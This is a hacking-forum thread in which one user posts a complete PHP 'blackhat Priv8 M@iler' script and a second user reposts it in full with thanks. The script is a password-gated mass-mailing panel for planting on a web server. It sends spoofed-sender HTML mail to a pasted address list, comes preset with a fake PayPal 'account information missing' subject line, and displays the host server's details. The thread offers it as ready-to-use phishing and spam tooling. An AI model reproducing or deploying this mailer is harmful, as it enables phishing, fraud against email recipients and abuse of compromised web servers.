Blackhat priv mass maill sender (1 Viewer)

Mectruy 

Not Gonna Get Us
Joined
Dec 1, 2015
Credits
201,695
Rating - 94.7%
1MqVNb.png



PHP:
<?php
@session_start();
@set_time_limit(0);
if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){
die('');
}
$create_password = true;
$password = "blackhat";
$pass=$_POST['pass'];
if($pass==$password){
$_SESSION['nst']="$pass";
}
if($create_password==true){
if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
die("
<noembed><xmp><body></xmp></noembed><noembed><xmp></body></html></xmp></noembed><title>YASSINE ZAHI</title><center><body background=white<table width=1 bgcolor=black><tr><td><font size=1 face=verdana><center><b></font></a><br></b></center><form method=post><font size=1 face=verdana color=bc2430><strong><center>HACKLOGIE<br>| Please Password |</center></strong><br><input type=password name=pass size=10></form>
</td></tr></table>
");}
}
$testa = $_POST['veio'];
if($testa != "") {
$message = $_POST['html'];
$subject = $_POST['assunto'].$_POST['assunto2'];
$nome = $_POST['nome'];
$de = $_POST['de'];
$to = $_POST['emails'];
$email = explode("\n", $to);
$message = stripslashes($message);
$i = 0;
$count = 1;
while($email[$i]) {
$ok = "ok";
$headers  = "MIME-Version: 1.0\n";
$headers .= "Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit
X-Mailer: EDMAIL R6.00.02
Content-Length: 41061\n";
$headers .= "From: ".$email[$i]."\r\n";
if(mail($email[$i], $subject, $message, $headers))
echo "<font face=Arial size=2 color=898989>| Numero : [$count] <b>".$email[$i]."</b>: <font face=Arial size=2 color=#0982ba>Sent . . . *o*</font><br><hr class=style-three>";
else
echo "<font face=Arial size=2 color=898989>| Numero : [$count] <b>".$email[$i]."</b>: <font face=Arial size=2 color=#b41420>Error in Sending ? :(</font><br><hr class=style-three>";
$i++;
$count++;
}
$count--;
if($ok == "ok")
echo "";

}

?>
<html>
<head>
<title>|| blackhat Priv8 M@iler ||</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8">.
<style>
       
hr.style-three {
    border: 0;
    border-bottom: 1px dashed #53646c;
    background: #484646;
}

.button {
    display: block;
    font-size: 13px;
    text-decoration: none!important;
    font-family: Helvetica, Arial, sans serif;
    padding: 8px 12px;
    border-radius: 3px;
    -moz-border-radius: 3px;
    box-shadow: inset 0px 0px 2px #fff;
    -o-box-shadow: inset 0px 0px 2px #fff;
    -webkit-box-shadow: inset 0px 0px 2px #fff;
    -moz-box-shadow: inset 0px 0px 2px #fff;
}
.button:active {
    box-shadow: inset 0px 0px 3px #999;
    -o-box-shadow: inset 0px 0px 3px #999;
    -webkit-box-shadow: inset 0px 0px 3px #999;
    -moz-box-shadow: inset 0px 0px 3px #999;
}
/* The styles for the grey button */
.grey {
    color: #444;
    border: 1px solid #d0d0d0;
    background-image: -moz-linear-gradient(#ededed, #e1e1e1);
    background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#e1e1e1), to(#ededed));
    background-image: -webkit-linear-gradient(#ededed, #e1e1e1);
    background-image: -o-linear-gradient(#ededed, #e1e1e1);
    text-shadow: 1px 1px 1px #fff;
    background-color: #e1e1e1;
}
.grey:hover {
    border: 1px solid #b0b0b0;
    background-image: -moz-linear-gradient(#e1e1e1, #ededed);
    background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#ededed), to(#e1e1e1));
    background-image: -webkit-linear-gradient(#e1e1e1, #ededed);
    background-image: -o-linear-gradient(#e1e1e1, #ededed);
    background-color: #ededed;
}
.grey:active {border: 1px solid #666;}

body {
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
        background-color: #FBFB08;
    margin-bottom: 0;
}
.fontx1 { color:#91161f;font-size:13px;
font-family:Arial, Helvetica, sans-serif;
}
.fontx2 { color:#016a9b;font-size:14px;
font-family:Arial, Helvetica, sans-serif;
}

.titulo {
    font-family: Arial, Helvetica, sans-serif;
    font-size: 70px;
    color: #1BF51F;
    font-weight: bold;
}

.normal {
    font-family: Arial, Helvetica, sans-serif;
    font-size: 12px;
    color: #1BF51F;
}
.form2 {
padding:4px 4px;
    font-family: Arial, Helvetica, sans-serif;
    font-size: 13px;
    color: #525252;
    background-color: #f2f2f2;
    border: 2px solid #1a1a1a;
    border-radius:5px;
}

.form {
padding:4px 4px;
    font-family: Arial, Helvetica, sans-serif;
    font-size: 13px;
    color: #c8c8c8;
    background-color: #0a0a0a;
    border: 2px solid #1a1a1a;
    border-radius:5px;
}

.texto {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-weight: bold;
}

.alerta {
    font-family: Arial, Helvetica, sans-serif;
    color: #911614;
    font-size: 10px;
}
#assunto { height:30px;
}

#assunto select {
    outline: 0;
    box-shadow: inset 0px 1px 3px 0px rgba(0, 0, 0, 0.1),
                0px 1px 0px 0px rgba(250, 250, 250, 0.5) ;
    color: #222; padding:2px;
    border-radius:3px;
    border:#CCC 1px solid;
    }
.style2 {
    text-align: center;
}
.style1 {
    text-align: left;
}
</style>
</head>
<body>
<form action="" method="post" enctype="multipart/form-data" name="form1">
    <div class="style2">
  <input type="hidden" name="veio" value="sim">

    <tr>

        <table style="width: 100%">
            <tr>
                <td style="width: 1686px">

<table border="0" width="80%" bordercolorlight="#FBFB08" bordercolordark="#FBFB08" style="border: 2px solid #161616;border-radius:5px;" bgcolor="black" >
     <td height="25" align="center" bgcolor="#FBFB08" style="width: 849px">
   
<tr align="left">
<td style="width: 849px" ><font class="fontx1">
Server Name : <?php echo $UNAME = @php_uname(); ?><br>
System : <?php echo $OS = @PHP_OS; ?><br>
Server IP : <?php echo $_SERVER['SERVER_ADDR']; ?><br>
Software : <?php echo $_SERVER['SERVER_SOFTWARE']; ?><br>
Admin Mail : <?php echo $_SERVER['SERVER_ADMIN']; ?> <br>
Safe Mode : <?php echo $safe_mode = @ini_get('safe_mode'); ?>
</td>

</center>


    </tr>
    <tr>
      <td height="194" valign="top" bgcolor="#FBFB08" style="width: 849px">
          <table width="100%"  border="0" cellpadding="0" cellspacing="5" class="normal" height="444">
          <tr>
            <td height="17" class="style1"><span class="fontx2">| SUBJECT :</span></td>
            <td height="17">
           
<input name="assunto2" id="assunto" class="form2" type="text" style="width: 280px" value="[PayPal] Some informations on your account appears to be missing or incorrect">
            </td>
          </tr>
          <tr align="center" bgcolor="#99CCFF">
            <td height="20" colspan="2" bgcolor="#FBFB08" class="style1"><span class="fontx2">
            |
            LETTER :</span></td>
          </tr>
          <tr align="right">
            <td height="146" colspan="2" valign="top"><br>
             <textarea name="html" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="html" cols="20">
       
        <p>   </p><font color="#FFFFFF">
The federal agency voted Thursday to invite comment on rules aimed at securing an open Internet, barring high-speed Internet service providers from blocking or discriminating against legal web traffic.    </font>       
             </textarea>
              <span class="alerta">| Reminder : Text HTML |</span></td>
          </tr>
          <tr align="center" bgcolor="#FBFB08">
            <td height="10" colspan="2" class="style1"><span class="fontx2">
            | MAILING LIST :</span></tr>
          <tr align="right">
            <td height="136" colspan="2" valign="top"><br>
              <textarea name="emails" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emails" cols="20">
[email protected]</textarea>
              <span class="alerta">| Mail List |</span> </td>
          </tr>
          <tr>
            <td height="26" valign="top" colspan="2" class="style1"><input class="button grey" type="submit" name="Submit" value="Send Message"></td>
          </tr>
        </table>
      </td>
    </tr>
    </table>
                </td>
                <td>
               
            </tr>
        </table>
    </div>
</form>
</body>
 

Yabgu Fatih Şah 

Kısaca Yeşil
Top Poster Of Month
Joined
Apr 7, 2023
Credits
13,748
Rating - 100%
1MqVNb.png



PHP:
<?php
@session_start();
@set_time_limit(0);
if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){
die('');
}
$create_password = true;
$password = "blackhat";
$pass=$_POST['pass'];
if($pass==$password){
$_SESSION['nst']="$pass";
}
if($create_password==true){
if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
die("
<noembed><xmp><body></xmp></noembed><noembed><xmp></body></html></xmp></noembed><title>YASSINE ZAHI</title><center><body background=white<table width=1 bgcolor=black><tr><td><font size=1 face=verdana><center><b></font></a><br></b></center><form method=post><font size=1 face=verdana color=bc2430><strong><center>HACKLOGIE<br>| Please Password |</center></strong><br><input type=password name=pass size=10></form>
</td></tr></table>
");}
}
$testa = $_POST['veio'];
if($testa != "") {
$message = $_POST['html'];
$subject = $_POST['assunto'].$_POST['assunto2'];
$nome = $_POST['nome'];
$de = $_POST['de'];
$to = $_POST['emails'];
$email = explode("\n", $to);
$message = stripslashes($message);
$i = 0;
$count = 1;
while($email[$i]) {
$ok = "ok";
$headers  = "MIME-Version: 1.0\n";
$headers .= "Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit
X-Mailer: EDMAIL R6.00.02
Content-Length: 41061\n";
$headers .= "From: ".$email[$i]."\r\n";
if(mail($email[$i], $subject, $message, $headers))
echo "<font face=Arial size=2 color=898989>| Numero : [$count] <b>".$email[$i]."</b>: <font face=Arial size=2 color=#0982ba>Sent . . . *o*</font><br><hr class=style-three>";
else
echo "<font face=Arial size=2 color=898989>| Numero : [$count] <b>".$email[$i]."</b>: <font face=Arial size=2 color=#b41420>Error in Sending ? :(</font><br><hr class=style-three>";
$i++;
$count++;
}
$count--;
if($ok == "ok")
echo "";

}

?>
<html>
<head>
<title>|| blackhat Priv8 M@iler ||</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8">.
<style>
      
hr.style-three {
    border: 0;
    border-bottom: 1px dashed #53646c;
    background: #484646;
}

.button {
    display: block;
    font-size: 13px;
    text-decoration: none!important;
    font-family: Helvetica, Arial, sans serif;
    padding: 8px 12px;
    border-radius: 3px;
    -moz-border-radius: 3px;
    box-shadow: inset 0px 0px 2px #fff;
    -o-box-shadow: inset 0px 0px 2px #fff;
    -webkit-box-shadow: inset 0px 0px 2px #fff;
    -moz-box-shadow: inset 0px 0px 2px #fff;
}
.button:active {
    box-shadow: inset 0px 0px 3px #999;
    -o-box-shadow: inset 0px 0px 3px #999;
    -webkit-box-shadow: inset 0px 0px 3px #999;
    -moz-box-shadow: inset 0px 0px 3px #999;
}
/* The styles for the grey button */
.grey {
    color: #444;
    border: 1px solid #d0d0d0;
    background-image: -moz-linear-gradient(#ededed, #e1e1e1);
    background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#e1e1e1), to(#ededed));
    background-image: -webkit-linear-gradient(#ededed, #e1e1e1);
    background-image: -o-linear-gradient(#ededed, #e1e1e1);
    text-shadow: 1px 1px 1px #fff;
    background-color: #e1e1e1;
}
.grey:hover {
    border: 1px solid #b0b0b0;
    background-image: -moz-linear-gradient(#e1e1e1, #ededed);
    background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#ededed), to(#e1e1e1));
    background-image: -webkit-linear-gradient(#e1e1e1, #ededed);
    background-image: -o-linear-gradient(#e1e1e1, #ededed);
    background-color: #ededed;
}
.grey:active {border: 1px solid #666;}

body {
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
        background-color: #FBFB08;
    margin-bottom: 0;
}
.fontx1 { color:#91161f;font-size:13px;
font-family:Arial, Helvetica, sans-serif;
}
.fontx2 { color:#016a9b;font-size:14px;
font-family:Arial, Helvetica, sans-serif;
}

.titulo {
    font-family: Arial, Helvetica, sans-serif;
    font-size: 70px;
    color: #1BF51F;
    font-weight: bold;
}

.normal {
    font-family: Arial, Helvetica, sans-serif;
    font-size: 12px;
    color: #1BF51F;
}
.form2 {
padding:4px 4px;
    font-family: Arial, Helvetica, sans-serif;
    font-size: 13px;
    color: #525252;
    background-color: #f2f2f2;
    border: 2px solid #1a1a1a;
    border-radius:5px;
}

.form {
padding:4px 4px;
    font-family: Arial, Helvetica, sans-serif;
    font-size: 13px;
    color: #c8c8c8;
    background-color: #0a0a0a;
    border: 2px solid #1a1a1a;
    border-radius:5px;
}

.texto {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-weight: bold;
}

.alerta {
    font-family: Arial, Helvetica, sans-serif;
    color: #911614;
    font-size: 10px;
}
#assunto { height:30px;
}

#assunto select {
    outline: 0;
    box-shadow: inset 0px 1px 3px 0px rgba(0, 0, 0, 0.1),
                0px 1px 0px 0px rgba(250, 250, 250, 0.5) ;
    color: #222; padding:2px;
    border-radius:3px;
    border:#CCC 1px solid;
    }
.style2 {
    text-align: center;
}
.style1 {
    text-align: left;
}
</style>
</head>
<body>
<form action="" method="post" enctype="multipart/form-data" name="form1">
    <div class="style2">
  <input type="hidden" name="veio" value="sim">

    <tr>

        <table style="width: 100%">
            <tr>
                <td style="width: 1686px">

<table border="0" width="80%" bordercolorlight="#FBFB08" bordercolordark="#FBFB08" style="border: 2px solid #161616;border-radius:5px;" bgcolor="black" >
     <td height="25" align="center" bgcolor="#FBFB08" style="width: 849px">
  
<tr align="left">
<td style="width: 849px" ><font class="fontx1">
Server Name : <?php echo $UNAME = @php_uname(); ?><br>
System : <?php echo $OS = @PHP_OS; ?><br>
Server IP : <?php echo $_SERVER['SERVER_ADDR']; ?><br>
Software : <?php echo $_SERVER['SERVER_SOFTWARE']; ?><br>
Admin Mail : <?php echo $_SERVER['SERVER_ADMIN']; ?> <br>
Safe Mode : <?php echo $safe_mode = @ini_get('safe_mode'); ?>
</td>

</center>


    </tr>
    <tr>
      <td height="194" valign="top" bgcolor="#FBFB08" style="width: 849px">
          <table width="100%"  border="0" cellpadding="0" cellspacing="5" class="normal" height="444">
          <tr>
            <td height="17" class="style1"><span class="fontx2">| SUBJECT :</span></td>
            <td height="17">
          
<input name="assunto2" id="assunto" class="form2" type="text" style="width: 280px" value="[PayPal] Some informations on your account appears to be missing or incorrect">
            </td>
          </tr>
          <tr align="center" bgcolor="#99CCFF">
            <td height="20" colspan="2" bgcolor="#FBFB08" class="style1"><span class="fontx2">
            |
            LETTER :</span></td>
          </tr>
          <tr align="right">
            <td height="146" colspan="2" valign="top"><br>
             <textarea name="html" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="html" cols="20">
      
        <p>   </p><font color="#FFFFFF">
The federal agency voted Thursday to invite comment on rules aimed at securing an open Internet, barring high-speed Internet service providers from blocking or discriminating against legal web traffic.    </font>      
             </textarea>
              <span class="alerta">| Reminder : Text HTML |</span></td>
          </tr>
          <tr align="center" bgcolor="#FBFB08">
            <td height="10" colspan="2" class="style1"><span class="fontx2">
            | MAILING LIST :</span></tr>
          <tr align="right">
            <td height="136" colspan="2" valign="top"><br>
              <textarea name="emails" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emails" cols="20">
[email protected]</textarea>
              <span class="alerta">| Mail List |</span> </td>
          </tr>
          <tr>
            <td height="26" valign="top" colspan="2" class="style1"><input class="button grey" type="submit" name="Submit" value="Send Message"></td>
          </tr>
        </table>
      </td>
    </tr>
    </table>
                </td>
                <td>
              
            </tr>
        </table>
    </div>
</form>
</body>
Sağolasın mec
 

Users who are viewing this thread

Top